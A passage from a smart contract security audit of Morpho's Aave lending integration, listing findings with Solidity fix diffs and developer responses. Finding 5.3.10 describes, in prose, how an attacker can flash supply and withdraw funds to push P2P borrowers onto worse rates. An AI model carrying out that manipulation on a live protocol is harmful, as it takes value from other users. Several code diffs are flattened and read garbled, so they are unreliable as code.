days to make sure everyone can check the relevance of these parameters. Also the governance has no incentives to implement wrong params that could harm Morpho and its users. Spearbit: Acknowledged. +5.3.8 NDS min/max value should be properly validated to avoid tx to always fail/skip loop Severity: Medium Risk Context: PositionsManagerForAaveGettersSetters.sol#L40-L43 Description: PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers updateBorrowers, updateSuppliers are called by • MatchingEngineForAavematchBorrowers • MatchingEngineForAaveunmatchBorrowers • MatchingEngineForAavematchSuppliers • MatchingEngineForAaveunmatchSuppliers Those functions and also directly updateBorrowers and updateSuppliers are also called by PositionsManager- ForAaveLogic Problems: • A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a sup- plier/borrower to be added to the tail of the list. This is something that Morpho would like to avoid because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers. • In the case where a list is long enough, a very high value would make the tranaction revert each time one of those function directly or indirectly call insertSorted. The gas “rail guard” present in the match/unmatch supplier/borrow is useless because the loop would be called at least one time. Recommendation: Make enough tests to determine a safe min/max value for NDS that protect from DOS but still make the protocol perform as expected. Morpho: Fix has been implemented. 16 Spearbit: Acknowledged. +5.3.9 Initial SwapManager cumulative prices values are wrong Severity: Medium Risk Context: SwapManagerUniV2.sol#L65-L66 Description: The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values. (reserve0, reserve1, blockTimestampLast) = pair.getReserves(); price0CumulativeLast = reserve1 / reserve0; price1CumulativeLast = reserve0 / reserve1; One of these values will (almost) always be zero due to integer division. Then, when the difference is taken to the real currentCumulativePrices in update, the TWAP will be a large, wrong value. The slippage checks will not work correctly. Recommendation: Consider using the same code as the UniswapV2 example oracle. Morpho: Fixed in PR #550. Spearbit: Acknowledged. +5.3.10 P2P borrowers’ rate can be reduced Severity: Medium Risk Context: MarketsManagerForAave.sol#L448 Situation: Users on the pool currently earn an inferior rate than users with P2P credit lines. There is a queue for being connected P2P. As this queue cannot br not be fully processed in one single transaction, the protocol introduces the concept of a maximum iteration count and a borrower/supplier "delta" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced which leads to worse rates. i.e: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). • An attacker supplies a huge amount, creating a P2P credit line for every borrower (they can repeat this step several times if the max iterations limit is reached). • The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool, but the algorithm performs a "hard withdraw" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrow rate) that are still wrongly recorded to be in a P2P position for some borrowers. Such increase in the borrow rate is socialized equally among all P2P borrowers (reflected in an updated p2pBorrowRate as the shareOfDelta increased). • The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it’s close to the on-pool rate. • If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the "demote borrowers" step of the algorithm), they will earn the better P2P rate than the on-pool rate they earned before. Recommendation: Consider mitigations for single-transaction flash supply & withdraw attacks. Morpho: We may to refactor the entire queue system at some point. Spearbit: Acknowledged. 17 +5.3.11 User withdrawals can fail if Morpho position is close to liquidation Severity: Medium Risk Context: PositionsManagerForAaveLogic.sol#L246 Description: When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool ("hard withdraw"). If Morpho’s position on Aave’s debt / collateral value is higher than the market’s maximum LTV ratio but lower than the market’s liquidation threshold, the borrow will fail and the position cannot be liquidated. Therefore withdrawals could fail. Recommendation: This seems hard to solve in the current system as it relies on the "hard withdraws" to always ensure enough liquidity for P2P suppliers. Consider ways to mitigate the impact of this problem. Morpho: Since Morpho will first launch on Compound (where there is only Collateral Factor), we will not focus now on this particular issue. Spearbit: Acknowledged. 5.4 Low Risk +5.4.1 Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf Severity: Low Risk Context: PositionsManagerForAaveLogic.sol#L252-L258 Description: Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_- receiver, _amount); The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver. This problem will arise when this internal function is called by PositionsManagerForAave.liquidate where sup- plier (borrower in this case) and receiver (liquidator) would not be the same address. Recommendation: Use the supplier address to access supplyBalanceInOf when emitting the Withdrawn event. emit Withdrawn( _supplier, _poolTokenAddress, _amount, supplyBalanceInOf[_poolTokenAddress][_receiver].onPool, supplyBalanceInOf[_poolTokenAddress][_receiver].inP2P, supplyBalanceInOf[_poolTokenAddress][_supplier].onPool, supplyBalanceInOf[_poolTokenAddress][_supplier].inP2P - - + + ); Morpho: Fixed in the PR #556, event has been moved to the entrypoint contract and uses msg.sender as the index which is the supplier. Spearbit: Acknowledged. 18 +5.4.2 _repayERC20ToPool is approving the wrong amount Severity: Low Risk Context: PositionsManagerForAaveLogic.sol#L502-L510 Description: _repayERC20ToPool is approving the amount of underlying token specified via the input parameter _amount when the correct amount that should be approved is the one calculated via: _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) ); Recommendation: Approve the correct amount of underlying token. A possible solution may be as depicted below: -_underlyingToken.safeApprove(address(lendingPool), _amount); IVariableDebtToken variableDebtToken = IVariableDebtToken( lendingPool.getReserveData(address(_underlyingToken)).variableDebtTokenAddress ); // Do not repay more than the contract's debt on Aave _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) ); +_underlyingToken.safeApprove(address(lendingPool), _amount); Additionally,variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) could be replaced by variableDebtToken.balanceOf(address(this)) to save gas given how balanceOf is In this case, the uint256 \_normalizedVariableDebt function parameter implemented on the Aave contract. should be removed. Morpho: Fixes have been implemented in the PR #536 Spearbit: Acknowledged. +5.4.3 Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates Severity: Low Risk Context: PositionsManagerForAaveLogic.sol#L416 Description: PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates is looping enteredMar- kets which could be an unbounded array leading to a reverted transaction caused by a block gas limit. While it is true that Morpho will probably handle a subset of assets controlled by Aave, this loop could still revert because of gas limits for a variety of reasons: • In the future Aave could have more assets and Morpho could match 1:1 those assets. • Block gas size could decrease. • Opcodes could cost more gas. Recommendation: Implement a mechanism that removes _poolTokenAddress from the market array to reduce array size if the user does not have more tokens in that specific market. Morpho: Fixed in PR #560 by possibly exiting the market on withdraw/repay. Spearbit: Acknowledged. 19 +5.4.4 Wrong liquidation value when withdrawn amount is non-zero Severity: Low Risk Context: PositionsManagerForAaveLogic.sol#L438-L439 Situation: When _withdrawnAmount is non-zero the liquidationValue computation uses asset- Data.liquidationValue but should use assetData.liquidationThreshold instead. Recommendation: Currently, this does not lead to any issues as _withdrawnAmount is always zero on liquidations and all other calls to _getUserHypotheticalBalanceStates ignore this liquidationValue. We still recommend fixing this bug in case the return value is used in the future. liquidationValue -= Math.min( liquidationValue, (_withdrawnAmount * assetData.underlyingPrice * assetData.liquidationValue) / (_withdrawnAmount * assetData.underlyingPrice * assetData.liquidationThreshold) / (assetData.tokenUnit * MAX_BASIS_POINTS) - + ); Morpho: Fixed in the PR #563 according to the recommendation. Spearbit: Acknowledged. +5.4.5 Missing parameter validation on setters and event spamming prevention Severity: Low Risk Context: • RewardsManagerForAave.sol#L72-L79, • MarketsManagerForAave.sol#L143-L151, • MarketsManagerForAave.sol#L189-L196, • MarketsManagerForAave.sol#L200-L202, • MarketsManagerForAave.sol#L206-L208, • PositionsManagerForAaveGettersSetters.sol#L33-L36 • PositionsManagerForAaveGettersSetters.sol#L40-L43 • PositionsManagerForAaveGettersSetters.sol#L47-L50 • PositionsManagerForAaveGettersSetters.sol#L54-L57 • PositionsManagerForAaveGettersSetters.sol#L61-L64 • PositionsManagerForAaveGettersSetters.sol#L68-L72 Description: User parameter validity should always be verified to prevent contract updates in an inconsistent state. The parameter’s value should also be different from the old one in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring. contracts/aave/RewardsManagerForAave.sol 20 function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner { + + } require(_aaveIncentivesController != address(0), "param != address(0)"); require(_aaveIncentivesController != aaveIncentivesController, "param != prevValue"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); contracts/aave/MarketsManagerForAave.sol function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner { reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; updateRates(_marketAddress); emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]); require(_marketAddress != address(0), "param != address(0)"); uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; if( finalReserveFactor !== reserveFactor[_marketAddress] ) { reserveFactor[_marketAddress] = finalReserveFactor; emit ReserveFactorSet(_marketAddress, finalReserveFactor); } updateRates(_marketAddress); - - - - - - - + + + + + + + + + + + } function setNoP2P(address _marketAddress, bool _noP2P) external onlyOwner isMarketCreated(_marketAddress) { + } require(_noP2P != noP2P[_marketAddress], "param != prevValue"); noP2P[_marketAddress] = _noP2P; emit NoP2PSet(_marketAddress, _noP2P); function updateP2PExchangeRates(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateP2PExchangeRates(_marketAddress); + { } 21 function updateSPYs(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateSPYs(_marketAddress); + { } contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner { require(_aaveIncentivesController != address(0), "param != address(0)"); require(_aaveIncentivesController != aaveIncentivesController, "param != prevValue"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); + + } Important note: _newNDS min/max value should be accurately validated by the team because this will influence the maximum number of cycles that DDL.insertSorted can do. Setting a value too high would make the transaction fail while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. A more detailed issue about the NDS value can be found here: #33 function setNDS(uint8 _newNDS) external onlyOwner { // add a check on `_newNDS` validating correctly max/min value of `_newNDS` require(NDS != _newNDS, "param != prevValue"); NDS = _newNDS; emit NDSSet(_newNDS); + + } Important note: _newNDS set to 0 would skip all theMatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas A more detailed issue about NDS value can be found here: #34 function setMaxGas(MaxGas memory _maxGas) external onlyOwner { // add a check on `_maxGas` validating correctly max/min value of `_maxGas` // add a check on `_maxGas` internal value checking that at least one of them is different compared to the old version maxGas = _maxGas; emit MaxGasSet(_maxGas); + + ,! } function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { require(_newTreasuryVaultAddress != address(0), "param != address(0)"); require(_newTreasuryVaultAddress != treasuryVault, "param != prevValue"); treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); + + } function setRewardsManager(address _rewardsManagerAddress) external onlyOwner { require(_rewardsManagerAddress != address(0), "param != address(0)"); require(_rewardsManagerAddress != rewardsManager, "param != prevValue"); rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress); emit RewardsManagerSet(_rewardsManagerAddress); + + } Important note: Should also check that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state. 22 + function setPauseStatus(address _poolTokenAddress) external onlyOwner { require(_poolTokenAddress != address(0), "param != address(0)"); bool newPauseStatus = !paused[_poolTokenAddress]; paused[_poolTokenAddress] = newPauseStatus; emit PauseStatusSet(_poolTokenAddress, newPauseStatus); } Recommendation: For each setter, add a validity check on user parameter and a check to prevent to update the state value with the same value and fire an event when it’s not needed. Morpho: After reflection, as all these function will be triggered by governance, It might be overkill to implement all these checks. Although we will implement min and max value for NDS and for maxGas values. Spearbit: Acknowledged. +5.4.6 DDL should prevent inserting items with 0 value Severity: Low Risk Context: DoubleLinkedList.sol#L83 Description: Currently the DDL library is only checking that the actual value (_list.accounts[_id].value) in the list associated with the _id is 0 to prevent inserting duplicates. The DDL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list and as a result the overall protocol to underperform. Recommendation: Add a require statement to prevent inserting empty values. function insertSorted( List storage _list, address _id, uint256 _value, uint256 _maxIterations ) internal { + require(_value != 0, "DLL: _value must be != 0"); require(_list.accounts[_id].value == 0, "DLL: account already created"); /// other code } Note that require should be added as soon as possible to also prevent an SLOAD from the second require. Morpho: Fixed in PR #526 Spearbit: Acknowledged. +5.4.7 insertSorted iterates more than max iterations parameter Severity: Low Risk Context: DoubleLinkedList.sol#L91 Description: The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times. Recommendation: Consider changing the code as follows: Morpho: Fixed in PR #526. Spearbit: Acknowledged. 23 +5.4.8 insertSorted does not behave like a FIFO for same values Severity: Low Risk Context: DoubleLinkedList.sol#L93 Description: Users that have the same value are inserted into the list before other users with the same value. It does not respect the "seniority" of the users order and should behave more like a FIFO queue. Recommendation: Consider introducing the following change: while ( numberOfIterations <= _maxIterations && current != _list.tail && _list.accounts[current].value > _value _list.accounts[current].value >= _value - + ) Morpho: Agree, it should behave like in FIFO style in this case, fixed in PR #526. Spearbit: Acknowledged. +5.4.9 insertSorted inserts elements at wrong index Severity: Low Risk Context: DoubleLinkedList.sol#L101 Description: The insertSorted function inserts elements after the last element has been insterted, when these should have actually been insterted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail. if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd } Example: • list = [20]. insert(40) then current == list.tail, and is inserted at the back instead of the front. result = [20, 40] • list = [30, 10], insert(20) insertion point should be before current == 10, but also current == tail therfore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20] Recommendation: Fix the algorithm (while still respecting FIFO, see #25). At some point, the while loop breaks and current points to some element. If _list.accounts[current].value < _value, it means current is a legiti- mate entry-point to insert before. Otherwise, we insert at the end. 24 function insertSorted( List storage _list, address _id, uint256 _value, uint256 _maxIterations ) internal { require(_list.accounts[_id].value == 0, "DLL: account already created"); uint256 numberOfIterations; address current = _list.head; while ( numberOfIterations <= _maxIterations && current != _list.tail && _list.accounts[current].value > _value _list.accounts[current].value >= _value current = _list.accounts[current].next; numberOfIterations++; ) { } address nextId; address prevId; if (numberOfIterations < _maxIterations && current != _list.tail) { if (_list.accounts[current].value < _value) { prevId = _list.accounts[current].prev; nextId = current; } else prevId = _list.tail; - + - + // ... } Morpho: Fixed in PR #526. Spearbit: Acknowledged. 5.5 Gas Optimization +5.5.1 PositionsManagerForAaveLogic gas optimization suggestions Severity: Gas Optimization Context: PositionsManagerForAaveLogic.sol#L91, PositionsManagerForAaveLogic.sol#L145 PositionsManager- ForAaveLogic.sol#L201 PositionsManagerForAaveLogic.sol#L305 Description: Update the remainingTo variable only when needed. Inside each function, the remainingTo counter could be moved inside the if statement to avoid calculation when the amount that should be subtracted is >0. Recommendation: Consider implementing the following gas optimization in the _supply function: 25 function _supply( address _poolTokenAddress, uint256 _amount, uint256 _maxGasToConsume ) internal isMarketCreatedAndNotPaused(_poolTokenAddress) { // ... /// Supply in P2P /// if ( borrowersOnPool[_poolTokenAddress].getHead() != address(0) && !marketsManager.noP2P(_poolTokenAddress) ) { // ... if (matched > 0) { // ... remainingToSupplyToPool -= matched; } remainingToSupplyToPool -= matched; + - } /// Supply on pool /// // ... } Morpho: Implemented as part of the PR #536 Spearbit: Acknowledged. +5.5.2 MarketsManagerForAave._updateSPYs could store calculations in local variables to save gas Severity: Gas Optimization Context: MarketsManagerForAave.sol#L403-L425 Description: The calculation in the actual code must be updated following this issue: #36. This current issue is an example on how to avoid an additional SLOAD. The function could store locally currentReserveFactor, newSupplyP2PSPY and newBorrowP2PSPY to avoid addi- tional SLOAD Recommendation: Store variable locally to save gas as shown below. uint16 currentReserveFactor = reserveFactor[_marketAddress]; uint256 newSupplyP2PSPY = (meanSPY * (MAX_BASIS_POINTS - currentReserveFactor)) / MAX_BASIS_POINTS; uint256 newBorrowP2PSPY = (meanSPY * (MAX_BASIS_POINTS + currentReserveFactor)) / MAX_BASIS_POINTS; supplyP2PSPY[_marketAddress] = newSupplyP2PSPY; borrowP2PSPY[_marketAddress] = newBorrowP2PSPY; emit P2PSPYsUpdated( _marketAddress, newSupplyP2PSPY, newBorrowP2PSPY ); Morpho: Recommendations have been implemented in PR #559 26 Spearbit: Acknowledged. +5.5.3 Declare variable as immutable/constant and remove unused variables Severity: Gas Optimization Context: • RewardsManagerForAave.sol#L29 • RewardsManagerForAave.sol#L30 • RewardsManagerForAave.sol#L31 • SwapManagerUniV2.sol#L27-L28 • SwapManagerUniV2.sol#L33 • SwapManagerUniV3.sol#L33 • SwapManagerUniV3.sol#L35 • SwapManagerUniV3.sol#L41 • SwapManagerUniV3.sol#L42 • SwapManagerUniV3.sol#L43 • SwapManagerUniV3OnEth.sol#L27 • SwapManagerUniV3OnEth.sol#L37 • SwapManagerUniV3OnEth.sol#L38 • SwapManagerUniV3OnEth.sol#L39 Description: Some state variable can be declared as immutable or constant to save gas. Constant variables should be names in uppercase + snake case following the official Solidity style guide. Additionally, variables which are never used across the protocol code can be removed to save gas during deployment and improve readability. RewardsManagerForAave.sol -ILendingPoolAddressesProvider public addressesProvider; -ILendingPool public lendingPool; +ILendingPool public immutable lendingPool; -IPositionsManagerForAave public positionsManager; +IPositionsManagerForAave public immutable positionsManager; SwapManagerUniV2.sol -IUniswapV2Router02 public swapRouter = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter ,! +IUniswapV2Router02 public constant SWAP_ROUTER = ,! IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter -IUniswapV2Pair public pair; +IUniswapV2Pair public immutable pair; SwapManagerUniV3.sol 27 -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -address public WETH9; // Intermediate token address. +address public immutable WETH9; // Intermediate token address. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public boolean singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2; Recommendation: • Declare selected variable as immutable. • Declare selected variable as constant and follow the solidity style guide for naming. • Remove unused variables. Morpho: Fixes have been implemented in the PR #554. We have also upgraded to Solidity 0.8.13 to leverage the “Reading From Immutable Variables” feature that has been introduced since Solidity 0.8.8 Spearbit: Acknowledged. +5.5.4 Function does not revert if balance to transfer is zero Severity: Gas Optimization Context: PositionsManagerForAave.sol#L228-L231 Description: Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily. Recommendation: Consider reusing the AmountIsZero() custom error in this function to prevent safeTransfer() from being called as well as the ReserveFeeClaimed event from being emitted if the amountToClaim is 0. 28 ERC20 underlyingToken = ERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS()); uint256 amountToClaim = underlyingToken.balanceOf(address(this)); + if (amountToClaim == 0) revert AmountIsZero(); underlyingToken.safeTransfer(treasuryVault, amountToClaim); emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim); Morpho: Recommendation added in PR #562 Spearbit: Acknowledged. 5.6 Informational +5.6.1 matchingEngine should be initialized in PositionsManagerForAaveLogic’s initialize function Severity: Informational Context: PositionsManagerForAaveLogic.sol#L38 Description: MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic Recommendation: ForAaveLogic.initialize Initialize MatchingEngineForAave when created and deployed by PositionsManager- Morpho: Now we are using the transparent proxy pattern instead of the UUPS’s one as contract’s exceeds max weight for deployment. I propose to ignore this issue or update it in case of the transparent proxy pattern has an issue as well. Spearbit: Acknowledged, just be sure to follow OZ best practice on contract initialization during the deployment phase. +5.6.2 Misc: notation, style guide, global unit types, etc Severity: Informational Context: SwapManagerUniV2.sol#L25, SwapManagerUniV3.sol#L28, SwapManagerUniV3.sol#L29, SwapMan- agerUniV3OnEth.sol#L23, SwapManagerUniV3OnEth.sol#L24, SwapManagerUniV3OnEth.sol#L33, SwapMan- agerUniV3OnEth.sol#L34, MarketsManagerForAave.sol#L32, MarketsManagerForAave.sol#L33 Description: Follow solidity notation, standard style guide and global unit types to improve readability. Recommendation: Consider implementing the following changes. SwapManagerUniV2.sol -uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points. +uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points. SwapManagerUniV2.sol -uint32 public constant TWAP_INTERVAL = 3600; // 1 hour interval. +uint32 public constant TWAP_INTERVAL = 1 hours; // 1 hour interval. -uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points. +uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points. SwapManagerUniV3OnEth.sol 29 -uint32 public constant TWAP_INTERVAL = 3600; // 1 hour interval. +uint32 public constant TWAP_INTERVAL = 1 hours; // 1 hour interval. -uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points. +uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points. -uint24 public constant FIRST_POOL_FEE = 3000; // Fee on Uniswap for stkAAVE/AAVE pool. +uint24 public constant FIRST_POOL_FEE = 3_000; // Fee on Uniswap for stkAAVE/AAVE pool. -uint24 public constant SECOND_POOL_FEE = 3000; // Fee on Uniswap for AAVE/WETH9 pool. +uint24 public constant SECOND_POOL_FEE = 3_000; // Fee on Uniswap for AAVE/WETH9 pool. MarketsManagerForAave.sol -uint16 public constant MAX_BASIS_POINTS = 10000; // 100% in basis point. +uint16 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis point. -uint16 public constant HALF_MAX_BASIS_POINTS = 5000; // 50% in basis point. +uint16 public constant HALF_MAX_BASIS_POINTS = 5_000; // 50% in basis point. Morpho: Part of the recommendations have been applied inside PR #561 Spearbit: Acknowledged. +5.6.3 Outdated or wrong Natspec documentation Severity: Informational Context: • SwapManagerUniV3.sol#L55-L57 • PositionsManagerForAaveGettersSetters.sol#L52 • PositionsManagerForAaveGettersSetters.sol#L115-L120 Description: Some Natspec documentation is missing parameters/return value or is not correctly updated to reflect the function code. Recommendation: Consider implementing the following changes. SwapManagerUniV3.sol /// @notice Constructs the SwapManagerUniV3 contract. /// @param _morphoToken The Morpho token address. +/// @param _morphoPoolFee TODO: ADD CORRECT DOC /// @param _rewardToken The reward token address. +/// @param _rewardPoolFee TODO: ADD CORRECT DOC constructor( address _morphoToken, uint24 _morphoPoolFee, address _rewardToken, uint24 _rewardPoolFee ) { // ... } PositionsManagerForAaveGettersSetters.sol 30 -/// @notice Sets the `_newTreasuryVaultAddress`. +/// @notice Sets the `treasuryVault`. /// @param _newTreasuryVaultAddress The address of the new `treasuryVault`. function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); } -/// @notice Returns the collateral value, debt value and max debt value of a given user (in ETH). +/// @notice Returns the collateral value, debt value, max debt value and liquidation value of a given user (in ETH). ,! /// @param _user The user to determine liquidity for. /// @return collateralValue The collateral value of the user (in ETH). /// @return debtValue The current debt value of the user (in ETH). /// @return maxDebtValue The maximum possible debt value of the user (in ETH). /// @return liquidationValue The value which made liquidation possible (in ETH). function getUserBalanceStates(address _user) external view returns ( uint256 collateralValue, uint256 debtValue, uint256 maxDebtValue, uint256 liquidationValue ) // ... { } Morpho: Applied in PR #561. Spearbit: Acknowledged. +5.6.4 Use the official UniswapV3 0.8 branch Severity: Informational Context: uniswap/* Description: The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8. Recommendation: There are issues with the current migration which can be avoided by using the official Uniswap V3 0.8 branch. Morpho: Agreed, added as dependency in PR #550 Spearbit: Acknowledged. 31 +5.6.5 Unused events and unindexed event parameters Severity: Informational Context: • RewardsManagerForAave.sol#L37 • RewardsManagerForAave.sol#L43 • SwapManagerUniV2.sol#L47 • SwapManagerUniV3.sol#L51 • SwapManagerUniV3OnEth.sol#L47 • MarketsManagerForAave.sol#L53 • MarketsManagerForAave.sol#L57 • MarketsManagerForAave.sol#L62 • MarketsManagerForAave.sol#L68-L72 • MarketsManagerForAave.sol#L78-L82 • MarketsManagerForAave.sol#L87 • PositionsManagerForAaveEventsErrors.sol#L97 • PositionsManagerForAaveEventsErrors.sol#L101 • PositionsManagerForAaveEventsErrors.sol#L105 • PositionsManagerForAaveEventsErrors.sol#L110 • PositionsManagerForAaveEventsErrors.sol#L120 • PositionsManagerForAaveEventsErrors.sol#L125 • PositionsManagerForAaveEventsErrors.sol#L131 • PositionsManagerForAaveEventsErrors.sol#L115 Description: Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools. Recommendation: Define such parameters as indexed and remove unused event from the code base. contracts/aave/RewardsManagerForAave.sol - event AaveIncentivesControllerSet(address _aaveIncentivesController); + event AaveIncentivesControllerSet(address indexed _aaveIncentivesController); - event UserIndexUpdated(address _user, address _poolTokenAddress, uint256 _index); + event UserIndexUpdated(address indexed _user, address indexed _poolTokenAddress, uint256 _index); contracts/common/SwapManagerUniV2.sol - event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut); + event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut); contracts/common/SwapManagerUniV3.sol - event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut); + event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut); contracts/common/SwapManagerUniV3.sol 32 - event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut); + event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut); contracts/aave/MarketsManagerForAave.sol - event MarketCreated(address _marketAddress); + event MarketCreated(address indexed _marketAddress); - event PositionsManagerSet(address _positionsManager); + event PositionsManagerSet(address indexed _positionsManager); - event NoP2PSet(address _marketAddress, bool _noP2P); + event NoP2PSet(address indexed _marketAddress, bool _noP2P); address _marketAddress, uint256 _newSupplyP2PSPY, uint256 _newBorrowP2PSPY -event P2PSPYsUpdated( - - - -); +event P2PSPYsUpdated( + + + +); address indexed _marketAddress, uint256 _newSupplyP2PSPY, uint256 _newBorrowP2PSPY - event P2PExchangeRatesUpdated( address _marketAddress, - uint256 _newSupplyP2PExchangeRate, - uint256 _newBorrowP2PExchangeRate - -); + event P2PExchangeRatesUpdated( address _marketAddress, + uint256 _newSupplyP2PExchangeRate, + uint256 _newBorrowP2PExchangeRate + +); contracts/aave/positions-manager-parts/PositionsManagerForAaveEventsErrors.sol -event TreasuryVaultSet(address _newTreasuryVaultAddress); +event TreasuryVaultSet(address indexed _newTreasuryVaultAddress); -event RewardsManagerSet(address _newRewardsManagerAddress); +event RewardsManagerSet(address indexed _newRewardsManagerAddress); -event AaveIncentivesControllerSet(address _aaveIncentivesController); +event AaveIncentivesControllerSet(address indexed _aaveIncentivesController); -event PauseStatusSet(address _poolTokenAddress, bool _newStatus); +event PauseStatusSet(address indexed _poolTokenAddress, bool _newStatus); -event ReserveFeeClaimed(address _poolTokenAddress, uint256 _amountClaimed); +event ReserveFeeClaimed(address indexed _poolTokenAddress, uint256 _amountClaimed); -event RewardsClaimed(address _user, uint256 _amountClaimed); +event RewardsClaimed(address indexed _user, uint256 _amountClaimed); -event RewardsClaimedAndSwapped(address _user, uint256 _amountIn, uint256 _amountOut); +event RewardsClaimedAndSwapped(address indexed _user, uint256 _amountIn, uint256 _amountOut); The following events should be removed from code base because they are never used 33 contracts/aave/positions-manager-parts/PositionsManagerForAaveEventsErrors.sol -event FeesClaimed(address _poolTokenAddress, uint256 _amountClaimed); Morpho: Fixes has been implemented in the PR #552 Spearbit: Acknowledged. +5.6.6 Rewards are ignored in the on-pool rate computation Severity: Informational Context: Protocol level Description: Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given high reward incentives paid out to on-pool users it could be the case that being on the pool yields a better rate than the P2P rate. Recommendation: While Morpho pays forward the reward incentives to on-pool users, they try to match all users P2P first. Users should be aware of this fact and lend/borrow directly from the underlying protocol instead of being matched P2P by Morpho if they want to maximize their rates. Morpho: This is the purpose of noP2P which disables P2P matching of a given market. 